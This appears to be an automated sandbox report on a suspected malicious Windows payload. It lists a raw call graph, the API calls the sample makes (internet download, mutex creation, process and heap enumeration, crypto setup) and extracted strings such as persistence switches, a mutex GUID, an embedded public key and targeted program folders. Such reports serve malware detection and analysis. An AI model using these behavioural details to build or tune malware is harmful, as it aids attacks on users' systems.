41390->41392 41391 f30d1e _flsall 41391->41320 41393 f30d8b 41392->41393 41510 f30dab LeaveCriticalSection LeaveCriticalSection _fwprintf 41393->41510 41511 f32310 41395->41511 41397 f1c593 41397->41327 41399 f3380e 41398->41399 41400 f337fe 41398->41400 41404 f33824 41399->41404 41440 f330c5 41399->41440 41401 f35208 __wcsnicmp 58 API calls 41400->41401 41402 f33803 41401->41402 41411 f338fa LeaveCriticalSection LeaveCriticalSection _fwprintf 41402->41411 41405 f3836b __flush 78 API calls 41404->41405 41406 f33837 41405->41406 41407 f3816b __flsbuf 58 API calls 41406->41407 41408 f33865 41407->41408 41412 f3818f 41408->41412 41410->41364 41411->41364 41413 f3819b _flsall 41412->41413 41414 f381a8 41413->41414 41415 f381bf 41413->41415 41482 f351d4 58 API calls __getptd_noexit 41414->41482 41416 f3825e 41415->41416 41418 f381d3 41415->41418 41486 f351d4 58 API calls __getptd_noexit 41416->41486 41421 f381f1 41418->41421 41422 f381fb 41418->41422 41420 f381ad 41423 f35208 __wcsnicmp 58 API calls 41420->41423 41483 f351d4 58 API calls __getptd_noexit 41421->41483 41425 f4b134 ___lock_fhandle 59 API calls 41422->41425 41435 f381b4 _flsall 41423->41435 41427 f38201 41425->41427 41426 f381f6 41428 f35208 __wcsnicmp 58 API calls 41426->41428 41429 f38227 41427->41429 41430 f38214 41427->41430 41431 f3826a 41428->41431 41434 f35208 __wcsnicmp 58 API calls 41429->41434 41469 f3827e 41430->41469 41487 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41431->41487 41437 f3822c 41434->41437 41435->41402 41436 f38220 41485 f38256 LeaveCriticalSection __unlock_fhandle 41436->41485 41484 f351d4 58 API calls __getptd_noexit 41437->41484 41441 f330d2 __ftell_nolock 41440->41441 41442 f33102 41441->41442 41443 f330ea 41441->41443 41444 f3816b __flsbuf 58 API calls 41442->41444 41445 f35208 __wcsnicmp 58 API calls 41443->41445 41446 f3310a 41444->41446 41447 f330ef 41445->41447 41449 f3818f __write 64 API calls 41446->41449 41505 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41447->41505 41450 f33126 41449->41450 41453 f33316 41450->41453 41454 f331a9 41450->41454 41467 f330fa 41450->41467 41451 f3a77e __fltin2 6 API calls 41452 f33451 41451->41452 41452->41404 41455 f3331f 41453->41455 41460 f332d2 41453->41460 41457 f331cf 41454->41457 41454->41460 41456 f35208 __wcsnicmp 58 API calls 41455->41456 41456->41467 41457->41467 41506 f3f648 62 API calls 6 library calls 41457->41506 41459 f33208 41462 f33234 ReadFile 41459->41462 41459->41467 41461 f3818f __write 64 API calls 41460->41461 41460->41467 41463 f33383 41461->41463 41464 f33259 41462->41464 41462->41467 41466 f3818f __write 64 API calls 41463->41466 41463->41467 41465 f3818f __write 64 API calls 41464->41465 41468 f3326c 41465->41468 41466->41467 41467->41451 41468->41467 41488 f4b3f1 41469->41488 41471 f3828f 41472 f38297 41471->41472 41473 f382a6 SetFilePointerEx 41471->41473 41474 f35208 __wcsnicmp 58 API calls 41472->41474 41475 f382d2 GetLastError 41473->41475 41476 f382be SetFilePointerEx 41473->41476 41480 f3829c 41474->41480 41501 f351e7 58 API calls 3 library calls 41475->41501 41476->41475 41477 f382e1 41476->41477 41479 f382e7 SetFilePointerEx 41477->41479 41477->41480 41481 f35208 __wcsnicmp 58 API calls 41479->41481 41480->41436 41481->41480 41482->41420 41483->41426 41484->41436 41485->41435 41486->41426 41487->41435 41489 f4b411 41488->41489 41490 f4b3fc 41488->41490 41496 f4b436 41489->41496 41503 f351d4 58 API calls __getptd_noexit 41489->41503 41502 f351d4 58 API calls __getptd_noexit 41490->41502 41493 f4b401 41495 f35208 __wcsnicmp 58 API calls 41493->41495 41494 f4b440 41497 f35208 __wcsnicmp 58 API calls 41494->41497 41498 f4b409 41495->41498 41496->41471 41499 f4b448 41497->41499 41498->41471 41504 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41499->41504 41501->41480 41502->41493 41503->41494 41504->41498 41505->41467 41506->41459 41507->41377 41508->41377 41509->41391 41510->41391 41512 f3231c _flsall 41511->41512 41513 f32332 _memset 41512->41513 41514 f3235f 41512->41514 41515 f32357 _flsall 41512->41515 41518 f35208 __wcsnicmp 58 API calls 41513->41518 41516 f30e53 __lock_file 59 API calls 41514->41516 41515->41397 41517 f32365 41516->41517 41524 f32130 41517->41524 41520 f3234c 41518->41520 41538 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41520->41538 41527 f3214b _memset 41524->41527 41531 f32166 41524->41531 41525 f32156 41526 f35208 __wcsnicmp 58 API calls 41525->41526 41528 f3215b 41526->41528 41527->41525 41527->41531 41535 f321a6 41527->41535 41560 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41528->41560 41539 f32399 LeaveCriticalSection LeaveCriticalSection _fwprintf 41531->41539 41532 f322b7 _memset 41536 f35208 __wcsnicmp 58 API calls 41532->41536 41533 f3816b __flsbuf 58 API calls 41533->41535 41535->41531 41535->41532 41535->41533 41540 f3b2f2 41535->41540 41561 f39544 58 API calls 3 library calls 41535->41561 41562 f3b5c4 41535->41562 41536->41528 41538->41515 41539->41515 41541 f3b2fd 41540->41541 41545 f3b312 41540->41545 41542 f35208 __wcsnicmp 58 API calls 41541->41542 41543 f3b302 41542->41543 41663 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41543->41663 41546 f3b347 41545->41546 41552 f3b30d 41545->41552 41664 f48a16 58 API calls __malloc_crt 41545->41664 41548 f3816b __flsbuf 58 API calls 41546->41548 41549 f3b35b 41548->41549 41630 f3b4b0 41549->41630 41551 f3b362 41551->41552 41553 f3816b __flsbuf 58 API calls 41551->41553 41552->41535 41554 f3b385 41553->41554 41554->41552 41555 f3816b __flsbuf 58 API calls 41554->41555 41556 f3b391 41555->41556 41556->41552 41557 f3816b __flsbuf 58 API calls 41556->41557 41558 f3b39e 41557->41558 41559 f3816b __flsbuf 58 API calls 41558->41559 41559->41552 41560->41531 41561->41535 41563 f3b5e5 41562->41563 41564 f3b5fc 41562->41564 41672 f351d4 58 API calls __getptd_noexit 41563->41672 41566 f3bd34 41564->41566 41571 f3b636 41564->41571 41683 f351d4 58 API calls __getptd_noexit 41566->41683 41567 f3b5ea 41570 f35208 __wcsnicmp 58 API calls 41567->41570 41569 f3bd39 41572 f35208 __wcsnicmp 58 API calls 41569->41572 41611 f3b5f1 41570->41611 41573 f3b63e 41571->41573 41576 f3b655 41571->41576 41575 f3b64a 41572->41575 41673 f351d4 58 API calls __getptd_noexit 41573->41673 41684 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41575->41684 41579 f3b66a 41576->41579 41582 f3b684 41576->41582 41583 f3b6a2 41576->41583 41576->41611 41577 f3b643 41580 f35208 __wcsnicmp 58 API calls 41577->41580 41674 f351d4 58 API calls __getptd_noexit 41579->41674 41580->41575 41582->41579 41587 f3b68f 41582->41587 41675 f38cde 58 API calls 2 library calls 41583->41675 41585 f3b6b2 41588 f3b6d5 41585->41588 41589 f3b6ba 41585->41589 41586 f489c2 __flsbuf 58 API calls 41590 f3b7a3 41586->41590 41587->41586 41677 f3f744 60 API calls 3 library calls 41588->41677 41591 f35208 __wcsnicmp 58 API calls 41589->41591 41592 f3b81c ReadFile 41590->41592 41597 f3b7b9 GetConsoleMode 41590->41597 41594 f3b6bf 41591->41594 41595 f3b83e 41592->41595 41596 f3bcfc GetLastError 41592->41596 41676 f351d4 58 API calls __getptd_noexit 41594->41676 41595->41596 41603 f3b80e 41595->41603 41599 f3b7fc 41596->41599 41600 f3bd09 41596->41600 41601 f3b819 41597->41601 41602 f3b7cd 41597->41602 41612 f3b802 41599->41612 41678 f351e7 58 API calls 3 library calls 41599->41678 41604 f35208 __wcsnicmp 58 API calls 41600->41604 41601->41592 41602->41601 41605 f3b7d3 ReadConsoleW 41602->41605 41603->41612 41614 f3b873 41603->41614 41617 f3bae0 41603->41617 41606 f3bd0e 41604->41606 41605->41603 41607 f3b7f6 GetLastError 41605->41607 41682 f351d4 58 API calls __getptd_noexit 41606->41682 41607->41599 41610 f30bed _free 58 API calls 41610->41611 41611->41535 41612->41610 41612->41611 41615 f3b8df ReadFile 41614->41615 41621 f3b960 41614->41621 41618 f3b900 GetLastError 41615->41618 41628 f3b90a 41615->41628 41616 f3bbe6 ReadFile 41623 f3bc09 GetLastError 41616->41623 41629 f3bc17 41616->41629 41617->41612 41617->41616 41618->41628 41619 f3ba1d 41624 f3b9cd MultiByteToWideChar 41619->41624 41680 f3f744 60 API calls 3 library calls 41619->41680 41620 f3ba0d 41622 f35208 __wcsnicmp 58 API calls 41620->41622 41621->41612 41621->41619 41621->41620 41621->41624 41622->41612 41623->41629 41624->41607 41624->41612 41628->41614 41679 f3f744 60 API calls 3 library calls 41628->41679 41629->41617 41681 f3f744 60 API calls 3 library calls 41629->41681 41631 f3b4bc _flsall 41630->41631 41632 f3b4e0 41631->41632 41633 f3b4c9 41631->41633 41634 f3b5a4 41632->41634 41636 f3b4f4 41632->41636 41665 f351d4 58 API calls __getptd_noexit 41633->41665 41670 f351d4 58 API calls __getptd_noexit 41634->41670 41639 f3b512 41636->41639 41640 f3b51f 41636->41640 41638 f3b4ce 41642 f35208 __wcsnicmp 58 API calls 41638->41642 41666 f351d4 58 API calls __getptd_noexit 41639->41666 41644 f3b541 41640->41644 41645 f3b52c 41640->41645 41641 f3b517 41648 f35208 __wcsnicmp 58 API calls 41641->41648 41652 f3b4d5 _flsall 41642->41652 41647 f4b134 ___lock_fhandle 59 API calls 41644->41647 41667 f351d4 58 API calls __getptd_noexit 41645->41667 41650 f3b547 41647->41650 41651 f3b539 41648->41651 41649 f3b531 41653 f35208 __wcsnicmp 58 API calls 41649->41653 41654 f3b55a 41650->41654 41655 f3b56d 41650->41655 41671 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41651->41671 41652->41551 41653->41651 41656 f3b5c4 __read_nolock 70 API calls 41654->41656 41658 f35208 __wcsnicmp 58 API calls 41655->41658 41659 f3b566 41656->41659 41660 f3b572 41658->41660 41669 f3b59c LeaveCriticalSection __unlock_fhandle 41659->41669 41668 f351d4 58 API calls __getptd_noexit 41660->41668 41663->41552 41664->41546 41665->41638 41666->41641 41667->41649 41668->41659 41669->41652 41670->41641 41671->41652 41672->41567 41673->41577 41674->41577 41675->41585 41676->41611 41677->41587 41678->41612 41679->41628 41680->41624 41681->41629 41682->41612 41683->41569 41684->41611 41688 f31ffe _flsall 41685->41688 41686 f32010 41687 f35208 __wcsnicmp 58 API calls 41686->41687 41689 f32015 41687->41689 41688->41686 41690 f3203d 41688->41690 41721 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41689->41721 41692 f38df4 __getstream 61 API calls 41690->41692 41693 f32042 41692->41693 41694 f3204b 41693->41694 41695 f32058 41693->41695 41696 f35208 __wcsnicmp 58 API calls 41694->41696 41697 f32081 41695->41697 41698 f32061 41695->41698 41700 f32020 _flsall @_EH4_CallFilterFunc@8 41696->41700 41704 f3b078 41697->41704 41701 f35208 __wcsnicmp 58 API calls 41698->41701 41700->41331 41701->41700 41705 f3b095 41704->41705 41706 f3b0a9 41705->41706 41720 f3b250 41705->41720 41727 f4fbc4 58 API calls __mbsnbcmp_l 41705->41727 41707 f35208 __wcsnicmp 58 API calls 41706->41707 41708 f3b0ae 41707->41708 41726 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41708->41726 41710 f3b2ac 41723 f4fba6 41710->41723 41712 f3208c 41722 f320ae LeaveCriticalSection LeaveCriticalSection _fwprintf 41712->41722 41714 f3b216 41714->41706 41728 f4fcf3 65 API calls __mbsnbicmp_l 41714->41728 41716 f3b249 41716->41720 41729 f4fcf3 65 API calls __mbsnbicmp_l 41716->41729 41718 f3b268 41718->41720 41730 f4fcf3 65 API calls __mbsnbicmp_l 41718->41730 41720->41706 41720->41710 41721->41700 41722->41700 41731 f4fa8f 41723->41731 41725 f4fbbf 41725->41712 41726->41712 41727->41714 41728->41716 41729->41718 41730->41720 41734 f4fa9b _flsall 41731->41734 41732 f4fab1 41733 f35208 __wcsnicmp 58 API calls 41732->41733 41735 f4fab6 41733->41735 41734->41732 41736 f4fae7 41734->41736 41749 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41735->41749 41742 f4fb58 41736->41742 41741 f4fac0 _flsall 41741->41725 41751 f37970 41742->41751 41745 f4fb03 41750 f4fb2c LeaveCriticalSection __unlock_fhandle 41745->41750 41746 f4bac1 __wsopen_nolock 109 API calls 41747 f4fb92 41746->41747 41748 f30bed _free 58 API calls 41747->41748 41748->41745 41749->41741 41750->41741 41752 f37993 41751->41752 41753 f3797d 41751->41753 41752->41753 41754 f3799a ___crtIsPackagedApp 41752->41754 41755 f35208 __wcsnicmp 58 API calls 41753->41755 41758 f379a3 AreFileApisANSI 41754->41758 41759 f379b0 MultiByteToWideChar 41754->41759 41756 f37982 41755->41756 41772 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41756->41772 41758->41759 41760 f379ad 41758->41760 41761 f379db 41759->41761 41762 f379ca GetLastError 41759->41762 41760->41759 41774 f38cde 58 API calls 2 library calls 41761->41774 41773 f351e7 58 API calls 3 library calls 41762->41773 41765 f379e3 41766 f3798c 41765->41766 41767 f379ea MultiByteToWideChar 41765->41767 41766->41745 41766->41746 41767->41766 41768 f37a00 GetLastError 41767->41768 41775 f351e7 58 API calls 3 library calls 41768->41775 41770 f37a0c 41771 f30bed _free 58 API calls 41770->41771 41771->41766 41772->41766 41773->41766 41774->41765 41775->41770 41776->41337 41777->41343 41778->41337 41779->41292 41781 f37e1a _flsall 41780->41781 41782 f38af7 __lock 51 API calls 41781->41782 41783 f37e21 41782->41783 41785 f37e4f DecodePointer 41783->41785 41788 f37eda __cinit 41783->41788 41786 f37e66 DecodePointer 41785->41786 41785->41788 41799 f37e76 41786->41799 41800 f37f28 41788->41800 41790 f37f37 _flsall 41790->39579 41791 f37e83 EncodePointer 41791->41799 41792 f37f1f 41793 f37b0b __lockerr_exit 3 API calls 41792->41793 41795 f37f28 41793->41795 41794 f37e93 DecodePointer EncodePointer 41794->41799 41796 f37f35 41795->41796 41805 f38c81 LeaveCriticalSection 41795->41805 41796->39579 41797 f37ea5 DecodePointer DecodePointer 41797->41799 41799->41788 41799->41791 41799->41794 41799->41797 41801 f37f08 41800->41801 41802 f37f2e 41800->41802 41801->41790 41804 f38c81 LeaveCriticalSection 41801->41804 41806 f38c81 LeaveCriticalSection 41802->41806 41804->41792 41805->41796 41806->41801 41807 f91920 41808 f3f7c0 __ftell_nolock 41807->41808 41809 f91943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 41808->41809 41810 f91a0b 41809->41810 41811 f919e2 GetProcAddress GetProcAddress 41809->41811 41812 f91aab 41810->41812 41815 f91a1b NetStatisticsGet 41810->41815 41811->41810 41813 f91acb 41812->41813 41814 f91ac4 FreeLibrary 41812->41814 41816 f91ad5 GetProcAddress GetProcAddress GetProcAddress 41813->41816 41842 f91b0d __ftell_nolock 41813->41842 41814->41813 41817 f91a69 NetStatisticsGet 41815->41817 41818 f91a33 __ftell_nolock 41815->41818 41816->41842 41817->41812 41819 f91a87 __ftell_nolock 41817->41819 41823 f6d550 101 API calls 41818->41823 41824 f6d550 101 API calls 41819->41824 41820 f91bee 41821 f91c1b 41820->41821 41822 f91c14 FreeLibrary 41820->41822 41825 f91c31 LoadLibraryA 41821->41825 41826 f91c24 41821->41826 41822->41821 41827 f91a5a 41823->41827 41824->41812 41829 f91d4b 41825->41829 41830 f91c4a GetProcAddress GetProcAddress GetProcAddress 41825->41830 41907 f649a0 13 API calls 4 library calls 41826->41907 41827->41817 41832 f91d59 12 API calls 41829->41832 41833 f9223f 41829->41833 41840 f91c84 __ftell_nolock 41830->41840 41849 f91cac __ftell_nolock 41830->41849 41831 f91c29 41831->41825 41831->41829 41835 f91e5c 41832->41835 41836 f92233 FreeLibrary 41832->41836 41895 f92470 41833->41895 41835->41836 41856 f91ed9 CreateToolhelp32Snapshot 41835->41856 41836->41833 41838 f91d3f FreeLibrary 41838->41829 41839 f9225b __ftell_nolock 41843 f6d550 101 API calls 41839->41843 41841 f6d550 101 API calls 41840->41841 41841->41849 41842->41820 41846 f6d550 101 API calls 41842->41846 41852 f91b7c __ftell_nolock 41842->41852 41845 f92276 GetCurrentProcessId 41843->41845 41844 f91d03 __ftell_nolock 41844->41838 41848 f6d550 101 API calls 41844->41848 41847 f9228f __ftell_nolock 41845->41847 41846->41852 41853 f6d550 101 API calls 41847->41853 41850 f91d3c 41848->41850 41849->41844 41851 f6d550 101 API calls 41849->41851 41850->41838 41851->41844 41852->41820 41854 f6d550 101 API calls 41852->41854 41855 f922aa 41853->41855 41854->41820 41857 f3a77e __fltin2 6 API calls 41855->41857 41856->41836 41858 f91ef0 41856->41858 41859 f922ca 41857->41859 41860 f91f03 GetTickCount 41858->41860 41861 f91f15 Heap32ListFirst 41858->41861 41860->41861 41862 f92081 41861->41862 41867 f91f28 __ftell_nolock 41861->41867 41863 f9209d Process32First 41862->41863 41864 f92095 GetTickCount 41862->41864 41865 f9210a 41863->41865 41872 f920b4 __ftell_nolock 41863->41872 41864->41863 41866 f92118 GetTickCount 41865->41866 41880 f92120 __ftell_nolock 41865->41880 41866->41880 41867->41862 41874 f9204e Heap32ListNext 41867->41874 41875 f92066 GetTickCount 41867->41875 41878 f6d550 101 API calls 41867->41878 41885 f91ff1 GetTickCount 41867->41885 41889 f6d550 41867->41889 41869 f91f56 Heap32First 41869->41867 41870 f6d550 101 API calls 41870->41872 41871 f92196 41873 f921a4 GetTickCount 41871->41873 41886 f921ac __ftell_nolock 41871->41886 41872->41865 41872->41870 41879 f920fb GetTickCount 41872->41879 41873->41886 41874->41862 41874->41867 41875->41862 41875->41867 41876 f92219 41882 f92229 41876->41882 41883 f9222d CloseHandle 41876->41883 41877 f6d550 101 API calls 41877->41880 41881 f91fd9 Heap32Next 41878->41881 41879->41865 41879->41872 41880->41871 41880->41877 41887 f92187 GetTickCount 41880->41887 41881->41867 41882->41836 41883->41836 41884 f6d550 101 API calls 41884->41886 41885->41867 41886->41876 41886->41884 41888 f9220a GetTickCount 41886->41888 41887->41871 41887->41880 41888->41876 41888->41886 41890 f6d559 41889->41890 41892 f6d57d __ftell_nolock 41889->41892 41908 f7b5d0 101 API calls __except_handler4 41890->41908 41892->41869 41893 f6d55f 41893->41892 41909 f6a5e0 101 API calls __except_handler4 41893->41909 41896 f9247a __ftell_nolock 41895->41896 41897 f924c3 GetTickCount 41896->41897 41898 f92483 QueryPerformanceCounter 41896->41898 41899 f924d6 __ftell_nolock 41897->41899 41900 f92499 __ftell_nolock 41898->41900 41901 f92492 41898->41901 41902 f6d550 101 API calls 41899->41902 41903 f6d550 101 API calls 41900->41903 41901->41897 41904 f924ea 41902->41904 41905 f924b7 41903->41905 41906 f92244 GlobalMemoryStatus 41904->41906 41905->41897 41905->41906 41906->41839 41907->41831 41908->41893 41909->41892

                                                                                                        Executed Functions

                                                                                                        Function 00F29F90 Relevance: 169.6, APIs: 65, Strings: 31, Instructions: 1565COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F1CF10: _memset.LIBCMT ref: 00F1CF4A
                                                                                                          • Part of subcall function 00F1CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                          • Part of subcall function 00F1CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F29FC4
                                                                                                        • GetLastError.KERNEL32 ref: 00F29FD2
                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00F29FDA
                                                                                                        • GetLastError.KERNEL32 ref: 00F29FE4
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0084C0D0,?), ref: 00F2A0BB
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2A0C2
                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00F2A161
                                                                                                          • Part of subcall function 00F224E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                          • Part of subcall function 00F224E0: GetLastError.KERNEL32 ref: 00F22509
                                                                                                          • Part of subcall function 00F224E0: CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2957410896-1250862213
                                                                                                        • Opcode ID: d1c225ff7ba184e7beccaf816866c7dc7037880acad766481629e3625921b955
                                                                                                        • Instruction ID: 1bc5a0f4a7b3354d894ba66b3736779f038ca3b572dd5e55f60bb7cd960c039c
                                                                                                        • Opcode Fuzzy Hash: d1c225ff7ba184e7beccaf816866c7dc7037880acad766481629e3625921b955
                                                                                                        • Instruction Fuzzy Hash: D9D2E2706043519BD724EF24EC56B9FB7E5BF84304F00092DF48597292EB79EA48EB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F91920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 606 f91920-f919e0 call f3f7c0 GetVersionExA LoadLibraryA * 3 609 f91a0b-f91a0d 606->609 610 f919e2-f91a05 GetProcAddress * 2 606->610 611 f91aba-f91ac2 609->611 612 f91a13-f91a15 609->612 610->609 613 f91acb-f91ad3 611->613 614 f91ac4-f91ac5 FreeLibrary 611->614 612->611 615 f91a1b-f91a31 NetStatisticsGet 612->615 616 f91b0d 613->616 617 f91ad5-f91b0b GetProcAddress * 3 613->617 614->613 618 f91a69-f91a85 NetStatisticsGet 615->618 619 f91a33-f91a5d call f3f7c0 call f6d550 615->619 621 f91b0f-f91b17 616->621 617->621 618->611 620 f91a87-f91aae call f3f7c0 call f6d550 618->620 619->618 620->611 625 f91c0a-f91c12 621->625 626 f91b1d-f91b23 621->626 628 f91c1b-f91c22 625->628 629 f91c14-f91c15 FreeLibrary 625->629 626->625 631 f91b29-f91b2b 626->631 633 f91c31-f91c44 LoadLibraryA 628->633 634 f91c24-f91c2b call f649a0 628->634 629->628 631->625 636 f91b31-f91b42 631->636 639 f91d4b-f91d53 633->639 640 f91c4a-f91c82 GetProcAddress * 3 633->640 634->633 634->639 643 f91b45-f91b47 636->643 645 f91d59-f91e56 GetProcAddress * 12 639->645 646 f9223f-f92256 call f92470 GlobalMemoryStatus call f3f7c0 639->646 641 f91caf-f91cb7 640->641 642 f91c84 640->642 650 f91cb9-f91cc0 641->650 651 f91d06-f91d08 641->651 654 f91c86-f91cac call f3f7c0 call f6d550 642->654 647 f91b49-f91b5d 643->647 648 f91b98-f91bb4 643->648 652 f91e5c-f91e63 645->652 653 f92233-f92239 FreeLibrary 645->653 671 f9225b-f922cd call f6d550 GetCurrentProcessId call f3f7c0 call f6d550 call f3a77e 646->671 669 f91b8a-f91b8c 647->669 670 f91b5f-f91b84 call f3f7c0 call f6d550 647->670 648->625 673 f91bb6-f91bca 648->673 658 f91ccb-f91ccd 650->658 659 f91cc2-f91cc9 650->659 656 f91d0a-f91d3c call f3f7c0 call f6d550 651->656 657 f91d3f-f91d45 FreeLibrary 651->657 652->653 660 f91e69-f91e70 652->660 653->646 654->641 656->657 657->639 658->651 665 f91ccf-f91cde 658->665 659->651 659->658 660->653 661 f91e76-f91e7d 660->661 661->653 667 f91e83-f91e8a 661->667 665->651 686 f91ce0-f91d03 call f3f7c0 call f6d550 665->686 667->653 674 f91e90-f91e97 667->674 669->648 670->669 687 f91bfc-f91bfe 673->687 688 f91bcc-f91bf6 call f3f7c0 call f6d550 673->688 674->653 681 f91e9d-f91ea4 674->681 681->653 689 f91eaa-f91eb1 681->689 686->651 687->625 688->687 689->653 696 f91eb7-f91ebe 689->696 696->653 702 f91ec4-f91ecb 696->702 702->653 706 f91ed1-f91ed3 702->706 706->653 709 f91ed9-f91eea CreateToolhelp32Snapshot 706->709 709->653 711 f91ef0-f91f01 709->711 713 f91f03-f91f0f GetTickCount 711->713 714 f91f15-f91f22 Heap32ListFirst 711->714 713->714 715 f91f28-f91f2d 714->715 716 f92081-f92093 714->716 719 f91f33-f91f9d call f3f7c0 call f6d550 Heap32First 715->719 717 f9209d-f920b2 Process32First 716->717 718 f92095-f92097 GetTickCount 716->718 720 f9210a-f92116 717->720 721 f920b4-f920f5 call f3f7c0 call f6d550 717->721 718->717 734 f91f9f-f91faa 719->734 735 f92015-f92060 Heap32ListNext 719->735 724 f92118-f9211a GetTickCount 720->724 725 f92120-f92135 720->725 721->720 749 f920f7-f920f9 721->749 724->725 732 f92137 725->732 733 f92196-f921a2 725->733 737 f92140-f92181 call f3f7c0 call f6d550 732->737 739 f921ac-f921c1 733->739 740 f921a4-f921a6 GetTickCount 733->740 738 f91fb0-f91feb call f3f7c0 call f6d550 Heap32Next 734->738 735->716 745 f92062-f92064 735->745 737->733 771 f92183-f92185 737->771 763 f91fed-f91fef 738->763 764 f9200f 738->764 752 f92219-f92227 739->752 753 f921c3-f92204 call f3f7c0 call f6d550 739->753 740->739 750 f92079-f9207b 745->750 751 f92066-f92077 GetTickCount 745->751 749->721 756 f920fb-f92108 GetTickCount 749->756 750->716 750->719 751->716 751->750 760 f92229-f9222b 752->760 761 f9222d CloseHandle 752->761 753->752 774 f92206-f92208 753->774 756->720 756->721 760->653 761->653 767 f91ff1-f92002 GetTickCount 763->767 768 f92004-f9200d 763->768 764->735 767->764 767->768 768->738 768->764 771->737 772 f92187-f92194 GetTickCount 771->772 772->733 772->737 774->753 775 f9220a-f92217 GetTickCount 774->775 775->752 775->753
                                                                                                        APIs
                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00F91983
                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00F91994
                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00F919A1
                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00F919AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00F919E8
                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00F919FB
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00F91A2D
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00F91A81
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91AC5
                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00F91ADB
                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00F91AEE
                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00F91B01
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91C15
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00F91C36
